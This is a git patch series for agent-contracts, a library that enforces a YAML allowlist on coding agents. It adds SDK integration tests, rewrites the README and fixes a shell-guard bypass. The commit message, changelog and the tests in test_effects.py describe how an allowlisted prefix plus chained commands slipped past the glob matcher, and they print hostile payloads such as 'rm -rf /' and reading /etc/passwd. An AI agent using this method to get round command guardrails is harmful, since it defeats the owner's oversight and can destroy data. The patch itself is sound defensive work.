a/tests/test_adapters/test_claude_agent.py +++ b/tests/test_adapters/test_claude_agent.py @@ -113,3 +113,26 @@ def test_violations_accumulated(self, hooks) -> None: "tool_input": {}, })) assert len(hooks.violations) == 1 + + +class TestRealSDKIntegration: + """Verifies the hooks dict produced by the adapter is consumable by the + real claude-agent-sdk. Skipped if claude-agent-sdk is not installed + (it requires Python 3.10+).""" + + def test_hooks_config_accepted_by_sdk(self, hooks) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + config = hooks.get_hooks_config() + # Real SDK exposes ClaudeAgentOptions and accepts a hooks mapping. + options = sdk.ClaudeAgentOptions(hooks=config) + assert options.hooks is config + + def test_pre_tool_use_signature_matches_hookcallback(self) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + # Adapter callbacks must accept (input_data, tool_use_id, context). + assert hasattr(sdk, "HookCallback") + import inspect + sig = inspect.signature(ContractHooks.pre_tool_use) + params = list(sig.parameters) + # self + 3 hook params + assert params[1:] == ["input_data", "tool_use_id", "context"] diff --git a/tests/test_adapters/test_crewai.py b/tests/test_adapters/test_crewai.py deleted file mode 100644 index 07ecc86..0000000 --- a/tests/test_adapters/test_crewai.py +++ /dev/null @@ -1,76 +0,0 @@ -"""Tests for CrewAI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict -from unittest.mock import MagicMock - -import pytest -import yaml - -from agent_contracts.adapters.crewai import ContractGuard -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def guard(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractGuard: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class 
TestContractGuard: - def test_from_file(self, guard) -> None: - assert guard.enforcer is not None - - def test_validate_inputs(self, guard) -> None: - errors = guard.validate_inputs({"query": "hello"}) - assert errors == [] - - def test_check_authorized_tool(self, guard) -> None: - guard.check_tool("search") - - def test_check_unauthorized_tool(self, guard) -> None: - with pytest.raises(ContractViolation): - guard.check_tool("evil_tool") - - def test_execute_crew(self, guard) -> None: - mock_crew = MagicMock() - mock_crew.kickoff.return_value = "result" - result = guard.execute(mock_crew, inputs={"query": "test"}) - assert result == "result" - mock_crew.kickoff.assert_called_once() - - def test_execute_with_invalid_input(self, tmp_path, tier1_data) -> None: - tier1_data["inputs"]["schema"]["required"] = ["query"] - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - guard = ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - mock_crew = MagicMock() - with pytest.raises(ContractViolation, match="Input validation"): - guard.execute(mock_crew, inputs={"wrong_field": "test"}) - - def test_wrap_tool(self, guard) -> None: - def my_tool(x: int) -> int: - return x * 2 - - wrapped = guard.wrap_tool(my_tool, "search") - assert wrapped(5) == 10 - - def test_wrap_unauthorized_tool(self, guard) -> None: - def my_tool() -> str: - return "result" - - wrapped = guard.wrap_tool(my_tool, "unauthorized_tool") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, guard) -> None: - try: - guard.check_tool("bad") - except ContractViolation: - pass - assert len(guard.violations) == 1 diff --git a/tests/test_adapters/test_langchain.py b/tests/test_adapters/test_langchain.py index 7c0b25a..164241e 100644 --- a/tests/test_adapters/test_langchain.py +++ b/tests/test_adapters/test_langchain.py @@ -61,3 +61,18 @@ def test_chain_end_postconditions(self, 
handler) -> None: def test_on_tool_end(self, handler) -> None: handler.on_tool_end("result") # No-op, should not raise + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed + langchain-core BaseCallbackHandler. Skipped if langchain-core absent.""" + + def test_subclass_of_real_base_callback_handler(self, handler) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + assert isinstance(handler, callbacks.BaseCallbackHandler) + + def test_hook_method_signatures_present(self) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + for name in ("on_tool_start", "on_tool_end", "on_chain_end", "on_llm_end"): + assert hasattr(callbacks.BaseCallbackHandler, name), f"SDK missing {name}" + assert hasattr(ContractCallbackHandler, name), f"adapter missing {name}" diff --git a/tests/test_adapters/test_openai_agents.py b/tests/test_adapters/test_openai_agents.py index 3bc88f4..6918f9f 100644 --- a/tests/test_adapters/test_openai_agents.py +++ b/tests/test_adapters/test_openai_agents.py @@ -101,3 +101,32 @@ def test_on_handoff(self, hooks) -> None: def test_on_llm_start(self, hooks) -> None: run_async(hooks.on_llm_start(None, None, None, None)) + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed SDK's + RunHooks base class. Skipped if openai-agents is not installed.""" + + def test_subclass_of_real_runhooks(self, hooks) -> None: + # agents.RunHooks is a parameterized generic alias + # (RunHooksBase[TContext, Agent]); the actual base class lives in + # agents.lifecycle and is what the adapter must subclass. 
+ pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + assert issubclass(ContractRunHooks, RunHooksBase) + assert isinstance(hooks, RunHooksBase) + + def test_hook_method_signatures_present(self) -> None: + pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + for name in ( + "on_tool_start", + "on_tool_end", + "on_llm_start", + "on_llm_end", + "on_agent_start", + "on_agent_end", + "on_handoff", + ): + assert hasattr(RunHooksBase, name), f"SDK is missing {name}" + assert hasattr(ContractRunHooks, name), f"adapter is missing {name}" diff --git a/tests/test_adapters/test_pydantic_ai.py b/tests/test_adapters/test_pydantic_ai.py deleted file mode 100644 index 3972a62..0000000 --- a/tests/test_adapters/test_pydantic_ai.py +++ /dev/null @@ -1,58 +0,0 @@ -"""Tests for Pydantic AI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict - -import pytest -import yaml - -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def middleware(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractMiddleware: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractMiddleware.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractMiddleware: - def test_from_file(self, middleware) -> None: - assert middleware.enforcer is not None - - def test_check_authorized_tool(self, middleware) -> None: - middleware.check_tool("search") - - def test_check_unauthorized_tool(self, middleware) -> None: - with pytest.raises(ContractViolation): - middleware.check_tool("evil_tool") - - def test_validate_result(self, middleware) -> None: - errors = middleware.validate_result({"result": "ok"}) - assert errors == [] - - def test_wrap_tool(self, middleware) -> None: - def search(q: str) -> str: - return 
f"found: {q}" - - wrapped = middleware.wrap_tool(search, "search") - assert wrapped("test") == "found: test" - - def test_wrap_unauthorized_tool(self, middleware) -> None: - def bad_tool() -> str: - return "nope" - - wrapped = middleware.wrap_tool(bad_tool, "unauthorized") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, middleware) -> None: - try: - middleware.check_tool("bad") - except ContractViolation: - pass - assert len(middleware.violations) == 1 From 8b5ee9040d7f0e99103445ecac53701f77b1eb7c Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Mon, 6 Apr 2026 16:00:14 -0500 Subject: [PATCH 3/4] docs(readme): add "Why YAML, not Markdown?" design rationale section Explains why the contract is a structured YAML artifact rather than prose: deterministic parse, typed fields for fail-closed enforcement, diff-friendly review, versioned schema, and consistency with existing cloud-native policy formats. Co-Authored-By: Claude Opus 4.6 (1M context) --- README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/README.md b/README.md index 22f55db..c8f7bf7 100644 --- a/README.md +++ b/README.md @@ -214,6 +214,19 @@ action.yml GitHub composite action AGENT_CONTRACT.yaml Canonical coding-agent contract ``` +## Why YAML, not Markdown? + +A contract is a machine-enforceable artifact, not documentation. Markdown is prose; YAML is structure. The difference matters when the same file has to be parsed by a CLI, an in-runtime enforcer, and a CI gate — and produce the same verdict every time. + +- **Deterministic parse.** YAML has a JSON Schema (`schemas/agent-contract.schema.json`). Every runtime, in any language, produces the same parse tree from the same file. Markdown would require an LLM or a brittle regex extractor, and the verdict would depend on which extractor you used. +- **Fail-closed needs typed fields.** `effects.authorized.filesystem.write: ["src/**"]` is a list of glob patterns. 
There is no ambiguity about whether `tests/secret.env` is in scope. A Markdown bullet under "## Files the agent can write" is interpretation, and interpretation is exactly what coding-agent guardrails cannot afford. +- **Diff-friendly review.** YAML diffs per field. A reviewer can see "this PR added `python -m mypy *` to authorized shell commands" as a one-line change. Markdown prose diffs are noisy and merge conflicts on policy text are hard to reason about. +- **Versioned schema.** `agent_contract: "0.1.0"` declares the spec version. Older runtimes can refuse contracts they don't understand; newer runtimes can ignore unknown fields under the `x-` prefix. Markdown has no equivalent. +- **Cloud-native muscle memory.** kubectl, GitHub Actions, OpenAPI, Helm, GitLab CI, ArgoCD — every fail-closed policy artifact in the ecosystem is YAML or JSON. Engineers already know how to author, lint, and review it. +- **Still legible.** For the canonical coding-agent case (one identity block, one effects block, a few postconditions), the YAML is short enough to read without ceremony. The quick-start contract above fits on one screen. + +Markdown is the right format for the *human spec* (`spec/SPECIFICATION.md`) and for prose explanations of how the system works. It is not the right format for the file the enforcer reads on every run. + ## Scope and non-goals This repo is intentionally narrow. From 1a73734d91844203db21111aea757ad7cb8aa319 Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Tue, 7 Apr 2026 01:43:30 -0500 Subject: [PATCH 4/4] sec(effects): strict-reject shell metacharacters; rewrite README for launch MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Security fix ============ The shell command matcher used fnmatch.fnmatch(). Pattern "python -m pytest *" matched commands like "python -m pytest tests/ ; rm -rf /" because the * glob consumed shell operators (;, &&, ||, |, &, >, <, `, $(, newline) as ordinary characters. 
An agent could bypass any allowlist entry by appending arbitrary chained or substituted commands after an authorized prefix. v0.2.x now strict-rejects any command containing one of those metacharacters, regardless of pattern match. New ShellMetacharacterError subclasses EffectDeniedError so existing handlers keep working but verdicts can distinguish "matched no allowlist entry" from "attempted to chain commands". Regression coverage in tests/test_effects.py covers ;, &&, ||, |, >, <, >>, $(, backtick, newline, and trailing &. A future v0.3.x may introduce a shlex-based token matcher for richer command shapes; until then, strict reject is the only correct fail-closed behavior. The README now documents the threat model and the trade-off explicitly. README rewrite for launch ========================= - New headline: "Declare what your coding agent may read, write, run, and spend — in one YAML file. Enforced at runtime. Gated in CI. Fails closed." - New "Why this, why now" section grounding urgency in 2026 coding-agent failure modes (Claude Code, Codex, Cursor, Devin, Aider). - New "What an agent cannot do under a contract" before/after table making every abstract term concrete (.env writes, rm -rf, shell injection, unauthorized network, token overruns, fake green runs). - Step 2 of the quick start now shows the Claude Agent SDK adapter forwarding tool calls into the enforcer, instead of manual enforcer.check_file_read() calls that made it look like the user was the enforcer. - Quick start contract trimmed to drop redundant enforcement: sync_block and severity: critical fields (sensible defaults). - aicontracts init template emits the trimmed shape too, so the README matches what `init --template coding -o AGENT_CONTRACT.yaml` actually writes. - All CLI examples now use the `aicontracts` console script instead of `python -m agent_contracts.cli`. - Verdict artifact JSON example pruned (drops final_gate, tool_calls). 
- New "Shell command matching: threat model" section documents the strict-reject behavior and the v0.3.x roadmap for token-based matching. Tests ===== 196 tests pass on Python 3.12 with [dev,claude,openai,langchain] installed (was 183, +13 shell bypass regression cases). All 5 real-SDK integration tests still pass. Lint + mypy clean. Co-Authored-By: Claude Opus 4.6 (1M context) --- CHANGELOG.md | 4 + README.md | 141 +++++++++++++++++++-------------- src/agent_contracts/cli.py | 4 - src/agent_contracts/effects.py | 69 +++++++++++++++- tests/test_effects.py | 47 +++++++++++ 5 files changed, 198 insertions(+), 67 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 384eb3d..63b9741 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -26,3 +26,7 @@ All notable changes to this project are tracked here. - CrewAI adapter and `[crewai]` extra - Pydantic AI adapter and `[pydantic-ai]` extra + +### Security + +- shell command authorization now strict-rejects any command containing a shell metacharacter (`;`, `&`, `|`, `<`, `>`, `` ` ``, `$(`, newline). Closes a bypass where the fnmatch `*` wildcard would consume chaining operators and let an attacker append payloads after an allowlisted prefix (e.g. `python -m pytest tests/ ; rm -rf /`). The new `ShellMetacharacterError` is a subclass of `EffectDeniedError` so existing handlers keep working. Regression coverage in `tests/test_effects.py`. diff --git a/README.md b/README.md index c8f7bf7..98f6860 100644 --- a/README.md +++ b/README.md @@ -1,58 +1,58 @@ -# Agent Contracts +# agent-contracts [![CI](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml/badge.svg)](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml) +[![PyPI](https://img.shields.io/pypi/v/aicontracts.svg)](https://pypi.org/project/aicontracts/) -**Repo-local, fail-closed guardrails for autonomous coding/build agents.** +**Declare what your coding agent may read, write, run, and spend — in one YAML file at the root of your repo. 
Enforced at runtime. Gated in CI. Fails closed.** -`agent-contracts` lets a repository declare what an agent may read, write, run, call, and spend — and then emit one durable verdict artifact showing whether the run passed, warned, blocked, or failed. - -The contract, CLI, verdict artifact, and GitHub Action are **framework-agnostic and provider-agnostic by design** — they don't depend on any agent SDK or model provider. Optional adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain are thin ergonomic helpers that forward in-runtime hook calls into the same enforcer. - -> **The CI verdict gate is the source of truth.** The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. +Works with Claude Code, Codex, Cursor, and any agent runtime — the core is framework- and provider-agnostic. Optional thin adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain. ```bash pip install aicontracts +aicontracts init --template coding -o AGENT_CONTRACT.yaml +aicontracts validate AGENT_CONTRACT.yaml ``` -## What it solves +> **The CI verdict gate is the source of truth.** Every run emits one durable `verdict.json`. The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. + +## Why this, why now + +Coding agents are in production. Claude Code, Codex, Cursor Agent, Devin, Aider — every one of them runs with ambient authority over your repo: whatever the shell, filesystem, and network will let them do. 
The failure modes are no longer hypothetical: + +- agents editing files outside the intended scope +- destructive shell commands run on the wrong branch +- silent token-budget overruns mid-loop +- the agent reports "all tests passing" while `pytest` on disk is red — and you merge it +- unauthorized network calls and tool use buried in the trace -Without a repo-local contract, coding agents usually run with ambient authority. -That creates five common failure modes: +A repo shouldn't trust an agent any more than it trusts a random PR. `agent-contracts` is the smallest thing that gives a repo a declarative *"here is exactly what this agent may do"* — and a CI gate that refuses to merge runs that violated it. -- edits outside the intended file scope -- forbidden shell commands -- unauthorized tool or network calls -- silent budget overruns -- fake green runs when repo checks are red +## What an agent cannot do under a contract -Agent Contracts keeps the scope narrow: +| Agent attempts | Without a contract | With agent-contracts | +|---|---|---| +| `Write(".env", ...)` | silently succeeds | not in `filesystem.write` → denied | +| `Bash("rm -rf node_modules")` | runs | not in `shell.commands` → denied | +| `Bash("python -m pytest tests/ ; rm -rf /")` | runs | shell metacharacter → denied | +| Fetches `https://evil.example.com` | runs | not in `network` → denied | +| Burns 200k tokens in a loop | silent | hits `max_tokens: 50000` → blocked | +| Reports "all tests passing" while pytest is red | merges green | postcondition fails → verdict: `fail`, CI gate red | -> declare the repo-local contract, enforce it at runtime and in CI, and fail closed with a verdict artifact. +## Quick start -## 5-minute quick start +### 1. Generate a starter contract -### 1. 
Write a coding-agent contract +```bash +aicontracts init --template coding -o AGENT_CONTRACT.yaml +``` + +This drops a ready-to-use coding-agent contract in your repo: ```yaml -# AGENT_CONTRACT.yaml agent_contract: "0.1.0" - identity: name: repo-build-agent version: "0.1.0" - description: Safe coding/build agent for this repository. - -contract: - postconditions: - - name: produces_output - check: "output is not None" - enforcement: sync_block - severity: critical - - - name: repo_checks_green - check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" - enforcement: sync_block - severity: critical effects: authorized: @@ -76,37 +76,47 @@ resources: observability: run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" + +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" ``` -### 2. Enforce it in the agent runtime +Empty `tools`, `network`, and `state_writes` lists mean *default-deny*: the agent cannot use any tool, hit any network endpoint, or write to any tracked state unless you list it. -```python -from agent_contracts import ContractEnforcer, load_contract +### 2. 
Hook it into your agent runtime -contract = load_contract("AGENT_CONTRACT.yaml") +The Claude Agent SDK adapter forwards every tool call into the enforcer — no manual instrumentation: -with ContractEnforcer(contract, host_name="codex") as enforcer: - enforcer.check_file_read("src/app.py") - enforcer.check_file_write("src/app.py") - enforcer.check_shell_command("python -m pytest tests/test_app.py") +```python +from agent_contracts import load_contract +from agent_contracts.adapters.claude_agent import ContractHooks +from claude_agent_sdk import ClaudeAgentOptions, query - result = {"status": "done"} +contract = load_contract("AGENT_CONTRACT.yaml") +hooks = ContractHooks(contract) - enforcer.record_check("pytest", "pass", exit_code=0) - enforcer.record_check("ruff", "pass", exit_code=0) - verdict = enforcer.finalize_run(output=result) +options = ClaudeAgentOptions(hooks=hooks.get_hooks_config()) +async for message in query(prompt="refactor src/app.py", options=options): + if hasattr(message, "total_cost_usd"): + hooks.track_result(message) -print(verdict.outcome) # pass | warn | blocked | fail -print(verdict.artifacts) # includes verdict artifact path +verdict = hooks.enforcer.finalize_run(output={"status": "done"}) +print(verdict.outcome) # pass | warn | blocked | fail ``` +OpenAI Agents SDK and LangChain adapters follow the same pattern. For agents *without* an SDK hook surface (bash drivers, custom subprocess loops), the verdict gate in step 3 still catches every violation post-hoc. + ### 3. Gate the verdict in CI ```bash -python -m agent_contracts.cli validate AGENT_CONTRACT.yaml -python -m agent_contracts.cli check-verdict .agent-contracts/runs/<run_id>/verdict.json +aicontracts validate AGENT_CONTRACT.yaml +aicontracts check-verdict .agent-contracts/runs/<run_id>/verdict.json ``` +`check-verdict` exits non-zero on `blocked` or `fail`. Wire it into a required GitHub check and the merge cannot proceed without an honest contract pass.
+ ## Verdict artifacts Every meaningful run can emit one compact artifact, for example: @@ -115,14 +125,12 @@ Every meaningful run can emit one compact artifact, for example: { "run_id": "...", "outcome": "pass", - "final_gate": "allowed", "checks": [ {"name": "pytest", "status": "pass", "exit_code": 0}, {"name": "ruff", "status": "pass", "exit_code": 0} ], "budgets": { "tokens": 12345, - "tool_calls": 0, "shell_commands": 2, "duration_seconds": 18.2 }, @@ -141,19 +149,19 @@ Outcome semantics: ```bash # Validate a contract and show coding/build surfaces -python -m agent_contracts.cli validate AGENT_CONTRACT.yaml +aicontracts validate AGENT_CONTRACT.yaml -# Check composition compatibility -python -m agent_contracts.cli check-compat producer.yaml consumer.yaml +# Generate a coding-agent starter template +aicontracts init --template coding -o AGENT_CONTRACT.yaml # Bootstrap from traces -python -m agent_contracts.cli init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml +aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml -# Generate a coding-agent starter template -python -m agent_contracts.cli init --template coding +# Check composition compatibility +aicontracts check-compat producer.yaml consumer.yaml -# Gate a verdict artifact in CI -python -m agent_contracts.cli check-verdict .agent-contracts/runs/<run_id>/verdict.json +# Gate a verdict artifact in CI (exits non-zero on blocked/fail) +aicontracts check-verdict .agent-contracts/runs/<run_id>/verdict.json ``` ## Framework adapters (optional) @@ -174,6 +182,19 @@ In-runtime adapters add hard-stop coverage where the host exposes a pre-executio A companion `@aicontracts/*` TypeScript package with adapters for Vercel AI SDK, Claude TypeScript SDK, and OpenAI Agents JS is planned for v0.3.0. +## Shell command matching: threat model + +Shell command authorization in v0.2.x is **strict reject + glob match**.
Any command containing a shell metacharacter — `;` `&` `|` `<` `>` `` ` `` `$(` or a newline — is denied outright, even if its prefix matches an allowlisted pattern. This rules out command chaining, redirection, process substitution, and command injection at the contract layer. + +```yaml +shell: + commands: + - "python -m pytest *" # matches: python -m pytest tests/test_app.py + # denied: python -m pytest tests/ ; rm -rf / +``` + +The trade-off: legitimate piped commands like `cat file | head` cannot be expressed as a single allowlist entry today. Wrap them in a script the contract authorizes by name, or split them into two records. v0.3.x will introduce a `shlex`-based token matcher that can express richer command shapes safely without weakening the fail-closed property. + ## GitHub Action ```yaml diff --git a/src/agent_contracts/cli.py b/src/agent_contracts/cli.py index fe89f54..2580ed2 100644 --- a/src/agent_contracts/cli.py +++ b/src/agent_contracts/cli.py @@ -232,8 +232,6 @@ def init( { "name": "repo_checks_green", "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", - "enforcement": "sync_block", - "severity": "critical", } ] }, @@ -251,8 +249,6 @@ def init( { "name": "produces_output", "check": "output is not None", - "enforcement": "sync_block", - "severity": "critical", } ] }, diff --git a/src/agent_contracts/effects.py b/src/agent_contracts/effects.py index a207faf..57dfb03 100644 --- a/src/agent_contracts/effects.py +++ b/src/agent_contracts/effects.py @@ -18,6 +18,30 @@ ShellAuthorization, ) +# Shell metacharacters that enable command chaining, redirection, or +# substitution. Any command containing one of these is rejected outright +# in v0.2.x, regardless of pattern match. The fail-closed contract has +# no safe way to express "this prefix is allowed but only without an +# appended `; rm -rf /`" using fnmatch globs, because `*` would consume +# the operator and the payload as ordinary characters. 
+# +# v0.3.x will introduce a shlex-based token matcher that can express +# richer command shapes safely; until then, strict reject is the only +# correct fail-closed behavior. +_SHELL_METACHARS = frozenset(";&|<>`\n") +_SHELL_METASEQUENCES = ("$(",) + + +def _shell_metachar_in(command: str) -> Optional[str]: + """Return the first shell metacharacter found, or None.""" + for ch in command: + if ch in _SHELL_METACHARS: + return ch + for seq in _SHELL_METASEQUENCES: + if seq in command: + return seq + return None + class EffectDeniedError(Exception): """Raised when a tool call or effect is not authorized.""" @@ -32,6 +56,29 @@ def __init__(self, effect_type: str, name: str, allowed: Sequence[str]) -> None: ) +class ShellMetacharacterError(EffectDeniedError): + """Raised when a shell command contains a chaining/redirection/ + substitution metacharacter. Distinct from a plain authorization + failure so callers and verdict artifacts can distinguish 'matched + no allowlist entry' from 'attempted to chain commands'.""" + + def __init__(self, command: str, metachar: str, allowed: Sequence[str]) -> None: + self.metachar = metachar + self.command = command + super().__init__( + "shell.command", + command, + allowed, + ) + # Override the message to surface the bypass attempt explicitly. + self.args = ( + f"shell.command '{command}' rejected: contains shell metacharacter " + f"'{metachar}'. Command chaining, redirection, and substitution are " + f"not permitted under v0.2.x effect authorization. 
" + f"Authorized patterns: {list(allowed) if allowed else '(none)'}", + ) + + def matches_any(name: str, patterns: Sequence[str]) -> bool: """Check if a name matches any of the given glob patterns.""" return any(fnmatch.fnmatch(name, pattern) for pattern in patterns) @@ -109,9 +156,21 @@ def check_file_write(self, path: str) -> bool: def check_shell_command(self, command: str) -> bool: if self._authorized is None or self._authorized.shell is None: return True + # Strict reject: any chaining/redirection/substitution metachar + # bypasses fnmatch's `*` and would let an attacker append payloads + # after an allowlisted prefix. Scan the RAW command (not the + # whitespace-normalized form) so newlines are not lost. + if _shell_metachar_in(command) is not None: + return False normalized = self._normalized_command(command) return matches_any(normalized, self._authorized.shell.commands) + def shell_command_metachar(self, command: str) -> Optional[str]: + """Return the first shell metacharacter in the command, or None. 
+ Exposed so callers can distinguish 'unauthorized' from 'rejected + as a chaining attempt' when constructing verdicts.""" + return _shell_metachar_in(command) + def require_tool(self, tool_name: str) -> None: if not self.check_tool(tool_name): raise EffectDeniedError( @@ -152,10 +211,14 @@ def require_file_write(self, path: str) -> None: def require_shell_command(self, command: str) -> None: if not self.check_shell_command(command): - allowed = [] + allowed: List[str] = [] if self._authorized is not None and self._authorized.shell is not None: - allowed = self._authorized.shell.commands - raise EffectDeniedError("shell.command", self._normalized_command(command), allowed) + allowed = list(self._authorized.shell.commands) + metachar = _shell_metachar_in(command) + normalized = self._normalized_command(command) + if metachar is not None: + raise ShellMetacharacterError(normalized, metachar, allowed) + raise EffectDeniedError("shell.command", normalized, allowed) def intersect_authorized(parent: EffectsAuthorized, child: EffectsAuthorized) -> EffectsAuthorized: diff --git a/tests/test_effects.py b/tests/test_effects.py index 672a9fa..f826bf4 100644 --- a/tests/test_effects.py +++ b/tests/test_effects.py @@ -7,6 +7,7 @@ from agent_contracts.effects import ( EffectDeniedError, EffectGuard, + ShellMetacharacterError, intersect_authorized, union_declared, validate_declared_subset, @@ -73,6 +74,52 @@ def test_shell_command_checks(self) -> None: assert guard.check_shell_command("python -m pytest tests/test_app.py") is True assert guard.check_shell_command("python -m mypy src") is False + @pytest.mark.parametrize( + "command", + [ + "python -m pytest tests/ ; rm -rf /", + "python -m pytest tests/ && curl evil.example.com", + "python -m pytest tests/ || echo pwned", + "python -m pytest tests/ | cat /etc/passwd", + "python -m pytest tests/ > /etc/hosts", + "python -m pytest tests/ < /dev/urandom", + "python -m pytest tests/ >> /var/log/owned", + "python -m pytest $(echo 
tests)", + "python -m pytest `whoami`", + "python -m pytest tests/\nrm -rf /", + "python -m pytest tests/ &", + ], + ) + def test_shell_metacharacter_bypass_denied(self, command: str) -> None: + """Regression: fnmatch's `*` wildcard would otherwise consume shell + operators and let an attacker append payloads after an allowlisted + prefix. The strict reject must catch every chaining vector.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.check_shell_command(command) is False + with pytest.raises(ShellMetacharacterError) as exc_info: + guard.require_shell_command(command) + assert "metacharacter" in str(exc_info.value) + + def test_shell_metacharacter_error_is_effect_denied(self) -> None: + """ShellMetacharacterError must be catchable as EffectDeniedError so + existing handlers keep working.""" + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + with pytest.raises(EffectDeniedError): + guard.require_shell_command("python -m pytest tests/ ; rm -rf /") + + def test_shell_metachar_introspection(self) -> None: + guard = EffectGuard( + EffectsAuthorized(shell=ShellAuthorization(commands=["python -m pytest *"])) + ) + assert guard.shell_command_metachar("python -m pytest tests/") is None + assert guard.shell_command_metachar("python -m pytest a ; b") == ";" + assert guard.shell_command_metachar("python -m pytest $(b)") == "$(" + assert guard.shell_command_metachar("python -m pytest a\nb") == "\n" + def test_empty_allowlist_denies_all(self) -> None: guard = EffectGuard(EffectsAuthorized(tools=[], network=[], state_writes=[])) assert guard.check_tool("anything") is False